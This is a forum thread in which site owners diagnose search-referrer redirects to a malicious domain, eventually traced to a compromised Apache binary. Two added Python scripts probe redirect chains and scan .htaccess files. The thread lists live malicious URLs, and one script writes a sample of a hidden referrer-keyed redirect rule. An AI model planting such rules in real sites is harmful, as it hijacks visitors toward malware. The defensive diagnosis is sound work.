Categories: Malware & hacked sites

URL hijack?

URL hijack? wredefine 1/29/09 1:58 PM
I'm helping a small business with their website and recently they have had a problem where users periodically experience a URL hijack when trying to reach the site from a Google search.  I have been able to reproduce the problem only once, and all of the checks in Google's webmaster tools come back as good.  The site is www.yogahome.net and the hijack URL is "http://220.196.59.23/index2.php?src=518&surl=www.yogahome.net&sport=80&suri=%2F".  Googling the IP yields some interesting results including this result from Norton: https://safeweb.norton.com/report/show?name=220.196.59.23

Any idea how to recover from this and get Google to remove the hijack link from their index?

Thanks in advance,
Johann

2009-01-29

I just had the URL hijack happen to me again - this time I captured a little more information.  I Googled "yoga cincinnati" and yogahome.net was the 5th result in the list.  When I clicked the link, I was taken to:
http://msvcp50.biz/index2.php?src=518&surl=www.yogahome.net&sport=80&suri=%2F

I clicked back to return to the result list, and copied the Google link URL, which was:

http://www.google.com/url?sa=t&source=web&ct=res&cd=15&url=http%3A%2F%2Fwww.yogahome.net%2F&ei=miyCSbG-H9eitgfB-eQk&usg=AFQjCNEUDkjqjDRNy1PF-KCac_ha4tRl9w&sig2=cHoQXcPFIktKPscjlaMkbw

instead of what it should have been: http://www.yogahome.net.  The rest of the links in the results list looked normal, in other words the link matched the green URL text below the site description.

Re: URL hijack? John 1/29/09 2:18 PM
I don't see that IP indexed with your domain any more:
http://www.google.com/search?num=100&hl=en&safe=off&q=site%3A220.196.59.23&btnG=Search

Plus your site is listed as being fine:
http://www.google.com/safebrowsing/diagnostic?site=yogahome.net
Re: URL hijack? Kaleh 1/29/09 3:40 PM
You definitely seem to have a redirect going on there, even though the Safebrowsing report hasn't flagged anything as malicious. 

When I attempted to access the site from the search results using FireFox3 with NoScript, the URL in the address bar changed to:

http: // msvcp50. biz/index2.php?src=518&surl= www. yogahome. net&sport=80&suri=%2F

NoScript didn't allow the page to load and I had the following in the upper left corner of my screen:

http: // ultimatecleaner. biz/hitin.php?land=20&affid=02913

I don't know how this helps you, but to confirm a redirect. 
Re: URL hijack? wredefine 1/29/09 3:54 PM
I think I have found my own answer.  I ran HTTP Watch on the dialog between my browser and the server, and I discovered that it is in fact my server that is issuing the redirect.  I happened to find this blog post: http://www.askdavetaylor.com/how_people_hack_apache_web_server_rewrite_rules.html that describes exactly my situation.  I'm opening a ticket with my hosting provider to check this out since I don't have access to the httpd.conf file, but I'm pretty sure that this is the source of my problem.

Thanks John and Kaleh for your replies!
Re: URL hijack? Kaleh 1/29/09 3:55 PM
I just tried accessing a second time and this time I go straight to the site. 

I have seen hacked sites behave this way before.  The redirect would occur sometimes, but not all the time.  I've read about some of them that occur randomly and some of them that record your IP address and don't allow it to happen a second time.  There was one I personally ran into a while back where I was able to get the redirect to occur again after I released and renewed my IP address.

My recollection was that those redirects were being caused by entries in the .htaccess file(s), although I suppose there could be other methods as well.
Re: URL hijack? vivian416 2/2/09 3:24 PM
I am experiencing the same thing with two of my websites. I have come across this forum and tried contacting my hosting provider. The hosting provider wasn't able to help me at all.

I have never been hacked before. As all of us are saying, the redirects would happen sporadically. Mine behaves the same way.

My solution so far seems to be to just remove the .htaccess file altogether. It seems to work so far.
Re: URL hijack? vivian416 2/2/09 3:31 PM
I thought it worked but it didn't.

Here's my link that was hijacked.
http://msvcp50.biz/index2.php?src=541&surl=www.freedebtconsultations.com&sport=80&suri=%2F

Any suggestions will be welcome.

Thanks
Re: URL hijack? wredefine 2/3/09 9:00 AM
Hi Vivian.  When you say that your hosting provider wasn't able to help you, what did you ask them to do?  Take a look at this link: http://www.askdavetaylor.com/how_people_hack_apache_web_server_rewrite_rules.html and then ask them specifically to check the HTTPD.CONF file for redirects.  My infrastructure provider was adamant that this was a 302 exploit (http://clsc.net/research/google-302-page-hijack.htm) but that doesn't hold water for a number of reasons.  My colleagues and I checked all of the sites that we had hosted on the same server using HTTPWatch (http://www.httpwatch.com/) and every one of them showed a server redirect being issued by Apache prior to any sort of page load, which points to the HTTPD.CONF file.

Our infrastructure provider's solution is to move the sites to another server, which has yielded positive results.  We have since purchased our own dedicated server so that we have a greater degree of control over the sites we host.  If your provider refuses to do this you may want to consider changing hosting providers.
Re: URL hijack? vivian416 2/3/09 11:55 AM
Thanks for your response. I asked my provider to check the server for redirects, then I got a response saying that I should contact Google or Yahoo for this issue. And I followed your advice to ask them to check HTTPD.CONF for redirects. Now I am waiting for them to respond. I read "http://www.askdavetaylor.com/how_people_hack_apache_web_server_rewrite_rules.html" as suggested; however, I don't believe I can run "grep" on Windows, can I?  Thanks so much for suggesting HTTPwatch. I am going to go ahead and see what I find.

I appreciate your response more than you know. I hope I get this resolved soon.

Thank you.
Re: URL hijack? vivian416 2/3/09 12:12 PM
I just got a response from the hosting provider. Here's what they say.

"I'm not seeing anything specific in the httpd.conf. If you are only having this happen through a search engine then it is possible that the search engine's cache is still corrupted and needs cleared."

I am bummed and confused now. Really have no clue what else I could do.
Re: URL hijack? vivian416 2/3/09 12:16 PM
Here is the summary from HTTPwatch. It almost looks like it is issuing this request against archive.org?


Started | Time | Sent | Received | Method | Result | Type | URL
+ 0.000 | 0.140 | 1105 | 583 | GET | 302 | Redirect to http://www.freedebtconsultations.com/ | http://rds.yahoo.com/_ylt=A0oGkkL6oohJPNUAL5hXNyoA;_ylu=X3oDMTByN2s4bDgzBHNlYwNzcgRwb3MDNARjb2xvA3NrMQR2dGlkAw--/SIG=11pisn0sd/EXP=1233777786/**http%3a//www.freedebtconsultations.com/
+ 0.142 | 0.296 | 501 | 907 | GET | 302 | Redirect to http://msvcp50.biz/index2.php?src=541&surl=www.freedebtconsultations.com&sport=80&suri=%2Findex%2Ephp | http://www.freedebtconsultations.com/
+ 0.441 | 0.032 | 0 | 0 | GET | NS_ERROR_MALWARE_URI | * | http://msvcp50.biz/index2.php?src=541&surl=www.freedebtconsultations.com&sport=80&suri=%2Findex%2Ephp
(totals) | 0.474 | 1606 | 1490 | 3 requests
00:00:00.624 | 0.319 | 856 | 176 | GET | 200 | text/html; charset=UTF-8 | http://toolbarqueries.google.com/search?client=navclient-auto&hl=en&ch=62553303521&ie=UTF-8&oe=UTF-8&features=Rank&q=info:http%3A%2F%2Fmsvcp50.biz%2Findex2.php%3Fsrc%3D541%26surl%3Dwww.freedebtconsultations.com%26sport%3D80%26suri%3D%252Findex%252Ephp
00:00:00.627 | 0.194 | 681 | 4377 | GET | 200 | text/html; charset=UTF-8 | http://www.google.com/search?hl=en&safe=off&q=site%3Amsvcp50.biz&btnG=Search
00:00:00.629 | 0.723 | 1119 | 2631 | GET | 200 | text/html; charset=UTF-8 | http://siteexplorer.search.yahoo.com/advsearch?p=http%3A%2F%2Fmsvcp50.biz%2Findex2.php%3Fsrc%3D541%26surl%3Dwww.freedebtconsultations.com%26sport%3D80%26suri%3D%252Findex%252Ephp&bwm=i&bwmo=d&bwmf=u
00:00:00.632 | 0.284 | 1014 | 2535 | GET | 200 | text/html; charset=UTF-8 | http://siteexplorer.search.yahoo.com/advsearch?p=http%3A%2F%2Fmsvcp50.biz&bwm=i&bwmo=d&bwmf=s
00:00:00.633 | 0.335 | 928 | 3683 | GET | 200 | text/xml; charset=utf-8 | http://search.msn.com/results.aspx?q=site%3Amsvcp50.biz&FORM=QBRE&format=xml
00:00:00.636 | 0.420 | 509 | 261 | GET | 200 | text/xml | http://xml.alexa.com/data?cli=10&dat=nsa&ver=quirk-searchstatus&uid=20080702094411&userip=192.168.1.5&url=msvcp50.biz
00:00:00.638 | 1.807 | 416 | 2321 | GET | 403 | text/html | http://web.archive.org/web/*/http://msvcp50.biz
00:00:00.640 | 0.344 | 566 | 960 | GET | 301 | Redirect to http://delicious.com/url/check?url=http%3A%2F%2Fmsvcp50.biz%2Findex2.php%3Fsrc%3D541%26surl%3Dwww.freedebtconsultations.com%26sport%3D80%26suri%3D%252Findex%252Ephp&submit=check%20url&settagview=list | http://del.icio.us/url/check?url=http%3A%2F%2Fmsvcp50.biz%2Findex2.php%3Fsrc%3D541%26surl%3Dwww.freedebtconsultations.com%26sport%3D80%26suri%3D%252Findex%252Ephp&submit=check%20url&settagview=list
00:00:00.642 | 0.084 | 0 | 0 | GET | (Cache) | text/plain | http://msvcp50.biz/robots.txt
00:00:00.644 | 0.667 | 399 | 347 | GET | 404 | text/html | http://msvcp50.biz/sitemap.xml
00:00:00.984 | 0.296 | 1117 | 1188 | GET | 302 | Redirect to http://delicious.com/url/a06c00eec4644a869de4857eb5103e43 | http://delicious.com/url/check?url=http%3A%2F%2Fmsvcp50.biz%2Findex2.php%3Fsrc%3D541%26surl%3Dwww.freedebtconsultations.com%26sport%3D80%26suri%3D%252Findex%252Ephp&submit=check%20url&settagview=list
00:00:01.282 | 0.321 | 933 | 4160 | GET | 200 | text/html; charset=UTF-8 | http://delicious.com/url/a06c00eec4644a869de4857eb5103e43
Re: URL hijack? JohnMu 2/3/09 3:02 PM
Hi vivian416 and welcome to the forum!

About one time out of three when accessing your site with a Google referrer I get redirected to that site. I'm pretty sure that it's either something in the Apache settings or with the code on your own site (eg. if you have the hack in a CMS that you are using). I would definitely follow up on this to get it resolved.

Here's how I looked at it (without using a browser, you never know with the malware out there; the actual command is the first line, the rest is wget's output):

C:\temp>wget -U Mozilla --referer http://www.google.com/search?q=something http://www.freedebtconsultations.com/
--23:56:49--  http://www.freedebtconsultations.com/
           => `index.html.12'
Resolving www.freedebtconsultations.com... 66.225.219.162
Connecting to www.freedebtconsultations.com|66.225.219.162|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://msvcp50. biz/index2.php?src=541&surl=www.freedebtconsultations.com&sport=80&suri=%2F [following]
--23:56:50--  http://msvcp50. biz/index2.php?src=541&surl=www.freedebtconsultations.com&sport=80&suri=%2F
           => `index2.php@src=541&surl=www.freedebtconsultations.com&sport=80&suri=%2F'
Resolving msvcp50. biz... 220.196.59.23
Connecting to msvcp50. biz|220.196.59.23|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.freedebtconsultations.com/ [following]
--23:56:51--  http://www.freedebtconsultations.com/
           => `index.html.12'
Connecting to www.freedebtconsultations.com|66.225.219.162|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

You can see that the server is redirecting to the bad site, but that one is redirecting back (perhaps because it's already seen my IP address?). At any rate, this is not a good thing and needs to be resolved as quickly as possible!

Hope it helps!
John

PS Here's a similar hack: http://johnmu.com/hack-hidden-redirect/ -- the URL redirected to looks too familiar...
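A scripted version of the check JohnMu describes above, added here as an example (it is not code from the thread or from any of the posters): the site is requested once with no referrer and once with a search-engine referrer, redirects are followed one hop at a time, and the whole chain is returned, so a 302 that leaves the site's own host is visible even when the next hop bounces the visitor straight back. Everything is Python 3 standard library. The local server in `demo()` is a constructed stand-in for the symptom so the script runs offline; `redirect-target.invalid` is a placeholder name, not a real host, and the off-site target is recorded but never fetched.

```python
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urljoin, urlparse

# Referrers to test with. The search-engine one is constructed; a search
# referrer is what triggered the redirect reported in the thread.
REFERERS = {
    "none": None,
    "google": "http://www.google.com/search?q=something",
}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib raise on 3xx instead of following, so every hop is visible."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_once(url, referer=None, timeout=5):
    """One GET without following redirects. Returns (status, Location-or-None)."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    if referer:
        req.add_header("Referer", referer)
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:   # raised for every 3xx/4xx/5xx
        return err.code, err.headers.get("Location")


def redirect_chain(url, referer=None, max_hops=5):
    """Follow redirects one hop at a time and stop at the first hop that leaves
    the site's own host. Off-site targets are recorded but never requested.
    Returns {"hops": [(status, target)], "leaves_site": bool}."""
    origin_host = urlparse(url).netloc
    hops, current = [], url
    for _ in range(max_hops):
        status, location = fetch_once(current, referer)
        if status not in (301, 302, 303, 307, 308) or not location:
            hops.append((status, None))
            return {"hops": hops, "leaves_site": False}
        target = urljoin(current, location)
        hops.append((status, target))
        if urlparse(target).netloc != origin_host:
            return {"hops": hops, "leaves_site": True}
        current = target
    return {"hops": hops, "leaves_site": False}


def probe(url):
    """Run the chain check once per referrer and return a per-referrer report."""
    return {name: redirect_chain(url, ref) for name, ref in REFERERS.items()}


class _SymptomServer(BaseHTTPRequestHandler):
    """Constructed stand-in for the behaviour reported in the thread: a 302 to
    an off-site host only when the visitor arrives from a search engine."""

    def do_GET(self):
        if "google.com" in self.headers.get("Referer", ""):
            self.send_response(302)
            self.send_header("Location", "http://redirect-target.invalid/index2.php?surl="
                             + self.headers.get("Host", ""))
            self.end_headers()
            return
        body = b"<html>normal page</html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def demo():
    """Serve the constructed symptom on a free local port, probe it, return the report."""
    server = HTTPServer(("127.0.0.1", 0), _SymptomServer)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return probe("http://127.0.0.1:%d/" % server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-7s leaves_site=%s hops=%s" % (name, result["leaves_site"], result["hops"]))
```

Against a real site, call `probe("http://www.yoursite.com/")` from a machine the site has not seen before (several posters noted the redirect fires only once per IP) and compare the two reports; a chain that differs by referrer, or any hop whose host is not your own, is the server-side redirect the thread is about, and the place to look next is whatever handles the request before your own pages run (configuration, modules, or the httpd binary itself).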
Re: URL hijack? vivian416 2/3/09 3:13 PM
I am trying everything to get this resolved and I am getting no results. My hosting provider is telling me they don't see anything from the Apache server.

As you suggested, you said it could be a hack in the CMS that I am using. How do I find that out?

Will it help if my websites migrate to another server?

Thanks so much for your response.

I am in need of desperate help.
Re: URL hijack? JohnMu 2/3/09 3:36 PM
Hi Vivian416
A simple way to check to see if the hack is in your CMS or not is to rename the "index.php" file (which most CMS have) to something else. This will/should break your site, but if you still see the redirect, then it has to be something somewhere else. If you have access to the .htaccess file, you can try the same there. I would not delete these files, just renaming them to something else is sufficient.

Good luck!
John
Re: URL hijack? vivian416 2/3/09 4:14 PM
No luck and I will keep trying. This is exhausting.

Thanks so much for all your help. I appreciate your suggestions and replies more than you know.

Vivian :(
Re: URL hijack? rudyh 2/4/09 5:59 AM
Hi Vivian,
You're not alone.... Exactly the same trick appears to happen with my website www.maitreya.nl; a one-time redirect when you come from Google. He checked with NOD32 Smart Security, and that appears to detect a Trojan...
The really bad news is that when I asked the webhost about this, they offered to completely rebuild the Apache server, but after that, the problem remained - a catch 22? Also the .htaccess files appear to have nothing to do with it. I don't use CMS on that website.

Love & clear light,
Rudy
Re: URL hijack? rudyh 2/4/09 6:05 AM
I forgot to say that when using different IP addresses, it only happens once per IP. Very intelligent & scary. By the way, it also redirects to the same website http://msvcp50. biz - with owners in China.
Re: URL hijack? vivian416 2/4/09 9:42 AM
Thanks Rudy for your input. This is very scary. I still haven't got this resolved. The hosting provider checked the HTTPD.CONF file for redirects but they couldn't find anything. And thank you for mentioning that you are not using a CMS either, as "JohnMu" mentioned that could be the case.

Mine seems to be the same case as yours in which .htaccess files appear to have nothing to do with it.

*sigh*
Re: URL hijack? wredefine 2/4/09 10:27 PM
My infrastructure provider didn't find anything in the HTTPD.CONF either.  However, I think I may have discovered the solution.

Basically, if you add a redirect of your own it looks like it overrides the malicious redirect and when you remove it, it clears the problem.  To do this via CPANEL, locate the "Redirects" (in the "Site Management" area).  Check that there are no redirects there and add one of your own.  The redirect will depend on what technology your site uses.  If it's HTML, then the redirect would look like: http://yoursite.com >> http://www.yoursite.com/index.html.  I recommend running HTTPWatch once before you do this to confirm that you are being re-directed, then apply the redirect, access the site again via the search engine with HTTPWatch on.  You should no longer see the redirect.  Go back into CPANEL and delete the redirect.  Again, access the site via the search engine and HTTPWatch to verify that the malicious redirect is completely gone.
Re: URL hijack? vivian416 2/4/09 11:05 PM
Wow...Thanks so much for this suggestion or perhaps a solution. This information is really helpful. Although I tried something similar to what you suggested and it didn't work. However, what you said was interesting because I never thought of it as being overridden.

I will definitely try your method again tomorrow.

My case seems to be closest to yours as we both were redirected to the same domain name. It has been taking me days trying to figure this nightmare out.

My hosting provider has no clue whatsoever. They are in the process of migrating one of my websites to another server(As hinted by you). I'll see if that will solve the problem. That was a panic move as I don't want to lose my ranking on google and the site being continuously infected by malware.

I really appreciate your help and input. I mean that sincerely.


Vivian
Re: URL hijack? rudyh 2/5/09 4:30 AM
More bad news, the http://msvcp50. biz is now listed at safeweb.norton.com/report/show?name=msvcp50.biz , which lists no fewer than 7 threats...
Re: URL hijack? rudyh 2/5/09 6:28 AM
OK, some good news: the trick of wredefine appears to work: so, set a temporary redirect at the webserver of your domain name and delete the redirect again, I checked a couple of people and the malicious redirect seems gone!
Re: URL hijack? rudyh 2/5/09 1:39 PM
Sorry, I cheered too quickly. It seems to be happening again...
Re: URL hijack? wredefine 2/5/09 2:26 PM
It seems that I also spoke too soon.  The trick I employed worked when I checked it with Firefox using HttpFox (the Firefox equivalent of HTTPWatch) last night.  Since I run Ubuntu Linux as my main OS, I didn't bother to fire up a Windows PC to try it in IE.  When I tried it this morning, it turns out that the problem is still there in IE, even though it's gone in Firefox.  :(

I do believe that whatever is causing the redirect is happening before the server processes the .HTACCESS file.  I set a global redirect to yahoo.com there and watched as I went from the Google search result to my site, then to msvcp50.biz and then to yahoo.com.

I wish I was smarter...
Re: URL hijack? rudyh 2/6/09 10:57 AM
One more hint: we do need to clear the browser cache before checking if it still happens after we made a possible fix. I kept forgetting that, so there is a small chance that the Apache & PHP rebuild on my server has actually done the job. I'll keep you informed.
Re: URL hijack? rudyh 2/7/09 3:28 AM
Well, clearing the cache didn't do it.
In the meantime, the people from the webhost are unable to even reproduce the redirect... What's the phone number of ghostbusters?
Re: URL hijack? Kaleh 2/7/09 4:24 AM
As I was reviewing my notes from various discussions about where the problem sometimes is found, I ran across one referencing the .htaccess file above the public_html.  I have absolutely no idea how feasible it is, but it may be another thing to check into.

This is a discussion from Badwarebusters.org where this is discussed.

http://badwarebusters.org/main/itemview/597
Re: URL hijack? rudyh 2/7/09 1:57 PM
Thanks Kaleh, but at least in my case, the .htaccess file is not affected. I fear that something quite advanced is used here....
Re: URL hijack? webado 2/7/09 2:43 PM
Please check the .htaccess file very carefully. Sometimes lots of blank lines are added at the bottom and only after miles of blank lines will you see the strange code.
 
Also there can be .htaccess files in any folder on the site.
 
And check the home directory because an .htaccess file there will affect the entire site.
 
Currently I am seeing the Apache green page at http://www.freedebtconsultations.com/ , so you no longer have a site it seems. Maybe your hoster is doing something with the dns.

Great Success !
Apache is working on your cPanel® and WHM™ Server
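The sweep webado recommends above (every .htaccess in the account, the home directory included, and a close look for directives pushed below a long run of blank lines), written out as an added example rather than anything posted in the thread. It is Python 3 standard library only; the blank-line threshold, the directive patterns and the list of "own" hostnames are this example's own choices, and the padded file built by `demo()` is a constructed sample of the trick, with `redirect-target.invalid` standing in for whatever host a real rule would name.

```python
import os
import re
import shutil
import tempfile

BLANK_RUN_THRESHOLD = 20  # a directive hidden below this many blank lines is suspicious
REFERER_COND = re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}", re.I)
REDIRECT_DIRECTIVE = re.compile(r"^(Redirect(Match|Permanent|Temp)?|RewriteRule)\b", re.I)
URL_HOST = re.compile(r"https?://([^/\s]+)", re.I)


def analyse_htaccess(text, own_hosts):
    """Return findings [(lineno, reason, line)] for one .htaccess body.
    own_hosts: lowercase hostnames that are legitimate redirect targets."""
    findings, blank_run = [], 0
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped:
            blank_run += 1
            continue
        if blank_run >= BLANK_RUN_THRESHOLD:
            findings.append((lineno, "directive follows %d blank lines" % blank_run, stripped))
        blank_run = 0
        if stripped.startswith("#"):
            continue
        if REFERER_COND.search(stripped):
            findings.append((lineno, "RewriteCond keyed on HTTP_REFERER", stripped))
        if REDIRECT_DIRECTIVE.match(stripped):
            for host in URL_HOST.findall(stripped):
                if host.lower() not in own_hosts:
                    findings.append((lineno, "redirect to off-site host " + host, stripped))
    return findings


def sweep(root, own_hosts):
    """Walk root, hidden directories included, and analyse every .htaccess.
    Returns {relative_path: findings} for the files that produced findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings = analyse_htaccess(fh.read(), own_hosts)
        if findings:
            report[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return report


def demo():
    """Build a constructed account tree with one clean and one padded .htaccess
    and sweep it. The padded file imitates the trick described in the thread."""
    root = tempfile.mkdtemp()
    try:
        store = os.path.join(root, "public_html", "store")
        os.makedirs(store)
        # Legitimate file: a canonical-host redirect to the site's own name.
        with open(os.path.join(root, "public_html", ".htaccess"), "w") as fh:
            fh.write("RewriteEngine On\n"
                     "RewriteCond %{HTTP_HOST} ^example\\.com$\n"
                     "RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]\n")
        # Constructed sample: harmless first line, 40 blank lines, then a
        # referrer-keyed rewrite to a placeholder host.
        with open(os.path.join(store, ".htaccess"), "w") as fh:
            fh.write("Options -Indexes\n" + "\n" * 40
                     + "RewriteCond %{HTTP_REFERER} google [NC]\n"
                     + "RewriteRule ^(.*)$ http://redirect-target.invalid/ [R=302,L]\n")
        return sweep(root, {"example.com", "www.example.com"})
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for path, findings in demo().items():
        for lineno, reason, line in findings:
            print("%s:%d: %s: %s" % (path, lineno, reason, line))
```

Run `sweep("/home/youraccount", {"yoursite.com", "www.yoursite.com"})` from a shell on the server (or on a downloaded copy of the account, since FTP clients hide dotfiles by default) and read every finding; a rewrite keyed on `HTTP_REFERER` that sends visitors off-site has no legitimate reason to be in a shared-hosting account. A clean sweep does not clear the server itself, which is where several posters in this thread eventually found the cause.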
Re: URL hijack? webado 2/7/09 2:45 PM
It could of course be any php script that's used on the site that does the redirection.
Re: URL hijack? rudyh 2/7/09 4:22 PM
True, but my website doesn't have any php...
Also, the redirect happens before you see the website, so the php should come before the index file, which I think is impossible?
The .htaccess file is definitely clean; good hint though, lots of empty lines would be easy to miss!
Re: URL hijack? webado 2/7/09 5:00 PM
I don't know what you are using on your site. Especially now that the site is no longer showing up at all, except as the generic homepage of an Apache server.
 
But php for sure you are or were using:
 
See all the pages suffixed as php?
 
I mentioned all the spots where it could have originated assuming it was not javascript. It would not have been javascript since JohnMu saw it in action with javascript not being involved.
Re: URL hijack? webado 2/7/09 5:09 PM
Oh of course you rudyh are not the same person whose site we were last discussing.
 
This is what happens when people jump in with their own problems. We lose track.
 
You got the doctype after the <html> tag. It should be before.
 
Not seeing your site flagged for malware in a site: query. Nor in Google's safebrowsing diagnostic page.
Re: URL hijack? webado 2/7/09 5:18 PM
Hah, I did get the redirection and all the blasted malware and the whole shooting match!
 
Yes, it's at your server level, no doubt about it.  I clicked the link to verklarende-woordenlijst.htm from a Google site query.
 
 
I see it has Frontpage extensions - if they are enabled for your account get rid of them and delete all the associated folders (_vti ... ).
 
It's either your site that's been hacked or the entire server. Do talk to your hoster and don't stop until they've dissected everything.
Re: URL hijack? rudyh 2/7/09 5:58 PM
Frontpage extensions are not enabled. :(
In the mean time, the helpful team of the host have already upgraded and rebuilt Apache and PHP on the server, and they cannot find anything suspicious in any of the files.
They even have trouble getting the redirect themselves, so they are gradually getting just as lost as I am...
Re: URL hijack? webado 2/7/09 7:25 PM
Well then their problem is deep rooted.
 
If after rebuilding Apache and php the hack is still there this is most mysterious.
Re: URL hijack? vivian416 2/10/09 12:03 PM
wredefine, there's a twist to my situation.

I had one of my websites migrated to a new server and that so far has yielded positive results. Then I went ahead and did the same thing with my reseller account which hosts multiple websites. But that didn't work. The redirects still exist but only with some of the websites.

Now I am more confused than I have ever been because these are all mixed results.
Re: URL hijack? webado 2/10/09 12:12 PM
If the subaccounts were migrated as is then they got migrated with the hacks as well.
Re: URL hijack? vivian416 2/10/09 12:32 PM
This is more of a question of my lack of knowledge of the subject than questioning you.

If these redirects are issued on the server level then how could the hacks be migrated as well?
Re: URL hijack? webado 2/10/09 12:40 PM
Some subaccounts may have been hacked at their level rather than higher up at the server level. Perhaps that was possible due to a vulnerability at the server level.
 
You need to comb through each one.
Re: URL hijack? webado 2/10/09 12:44 PM
For instance if an .htaccess file in a subaccount was hacked, or any scripts, migrating the subaccount by copying it will bring along its hacked .htaccess file or scripts as well.
Re: URL hijack? vivian416 2/10/09 12:49 PM
Thank you for such quick responses. Oh...I see what you are saying; however, in my case it has nothing to do with .htaccess files in the first place. But do you have any suggestion as to where I should be looking for the hack? Where would these hacks be possibly hiding?
Re: URL hijack? webado 2/10/09 12:56 PM
Any php scripts may have been corrupted.
Even in the database you may have tainted data.

What kind of software do you have on those sites? blog? cms? ecommerce? Which ones?
Re: URL hijack? vivian416 2/10/09 1:03 PM
I don't have any software that you have mentioned on my websites.

But I will look into it very hard as you mentioned....really comb through each and every one of them.
Re: URL hijack? vivian416 2/11/09 7:45 PM
Now I am almost certain it has everything to do with the server level. I am not sure I know the subject enough to make this assumption perhaps someone may be able to tell me if that's true. And if yes, should I just change my hosting provider?

I just removed the entire content of the website. It's a completely empty directory. And now I get redirected to the hacked page EVERY TIME instead of every other time. Perhaps if someone reads this they can try and see if they get the same result.

Go to yahoo and type "debt group" --> 4th result ---> my website is freedebtconsultations.com
Re: URL hijack? webado 2/11/09 8:43 PM
Certainly looks like that.
 
Please look for an .htaccess file somewhere. It's a hidden file so you have to turn on viewing hidden files.
Re: URL hijack? rudyh 2/12/09 2:10 AM
My .htaccess files are clean.... :-(
I'm following the redirects now with httpwatch (a free program), and it seems that at random, I get 3 types of results when I visit pages via the links in Google or Yahoo:
1. No redirect - as it should be
2. A full redirect, where you end up at the malicious website (usually only once per day per IP address)
3. A redirect, but still going to my website - visible with httpwatch, but then a redirect again, back to my own website: a normal visitor would not notice anything (!)
4. Series of redirects: first to my site maitreya.nl, then to msvcp50.biz, then to maitreya.nl again, then to msvcp50.biz again, and usually ending at maitreya.nl, so somehow the redirect software seems to trigger itself again.
Re: URL hijack? webado 2/12/09 5:31 AM
Rudyh, it has to be somewhere. It's not by magic.

Your site does not work at all without www.

Error fetching url.

So your dns zone is set up incorrectly as well.

There's a chance I suppose that it's your nameservers that have been hacked and the redirections happen from there.

Check with your hoster if you have not found any .htaccess file nor any php script on your site that are responsible for the redirections.
Re: URL hijack? rudyh 2/13/09 2:04 AM
The problem seems to be solved, I finally got rid of the malicious redirects. After several trials, the webhost replaced the "Apache binary" with a new fresh one, and that did it!

The strange problem with the DNS (http://maitreya.nl gives a 404, not found, so it needs the www. in front) is not solved yet, this only began yesterday, and only happens in IE; Firefox simply does find the page...
Thank you, webado for pointing this out to me!
Re: URL hijack? webado 2/13/09 5:48 AM
It is not responding with a 404 either. Just nothing.   When accessing with IE the response is:

Oops! This link appears broken.

DNS error - cannot find server.

When accessing in Firefox it seems to redirect somehow to http://www.maitreya.nl/ but I don't know how it does it. I have a new Firefox version, and it seems to go through Google's cache and then conclude it should show the www version.

However the response for http://maitreya.nl/ should be either a clear 200 or a clear 301 redirection to http://www.maitreya.nl/

If your response had been a 200 I would have advised you to then 301 redirect it to http://www.maitreya.nl/ using the .htaccess file in order to consolidate the site under one canonical form.
Re: URL hijack? wredefine 2/13/09 6:02 AM
Vivian - this may sound like a dumb question, but did your reseller account go to the same server as the single website you mentioned as being fixed?
Rudy - wow, a hacked Apache bin file?  That's pretty scary.  If that's the culprit, all the .htaccess and httpd.conf files in the world won't matter.
Webado - thanks for jumping in and lending your expertise!
Re: URL hijack? rudyh 2/13/09 6:42 AM
You are right webado, actually it is not a 404, it just says: "Internet Explorer cannot display the webpage".
When I use Firefox and httpwatch, it first says "NS_ERROR_UNKNOWN_HOST", next it simply uses the cache, or (when the cache is cleared) it reads "1 request" (no details, and it takes no time) and as third it simply goes to www.maitreya.nl.
IE also lists the 'request' as second step, but then doesn't go anywhere...  So the problem certainly seems to be with the DNS. I'll look into that, many thanks again.
Re: URL hijack? webado 2/13/09 6:53 AM
>> Rudy - wow, a hacked Apache bin file?  That's pretty scary.  If that's the culprit, all the .htaccess and httpd.conf files in the world won't matter
 
Absolutely. A totally hacked server, a hacker's delight. May they all roast in hell! :(

Maybe we can assume that all cases of redirection to that particular nasty site are due to a hacked Apache binary? Scary indeed, but what's scarier is that convincing the server admins of that will be a job and a half.
Re: URL hijack? rudyh 2/13/09 7:36 AM
The response of the very helpful server admin was a bit vague, yes. He said "The problem with the binary had nothing to do with your account or your accounts security, but rather a flaw in the actual binary, which should be fixed now."
Well, I sure hope so...  ;-)
Re: URL hijack? webado 2/13/09 7:54 AM
Oh really? And just by miracle that also cured the redirection? or did it?
 
Well server admins the world over are usually reluctant to admit that maybe there is or was a real problem somewhere.
Re: URL hijack? rudyh 2/13/09 8:43 AM
Well yes, in as far as that I have not seen any redirections since.
They did take 3 days and several trials and errors until this one worked though. Anyways, I would not even know what the Apache binary is - I am happy to leave that to the specialists. ;-)
Re: URL hijack? webado 2/13/09 8:55 AM
The Apache binary? It's all of the programs and files involved in the Apache server.

If you have ever installed Apache on your pc (e.g. XAMPP from http://www.apachefriends.org/en/xampp.html) to test your website on your own pc, you will see a folder called bin under the main Apache folder, and it's loaded with all sorts of files that make up Apache.

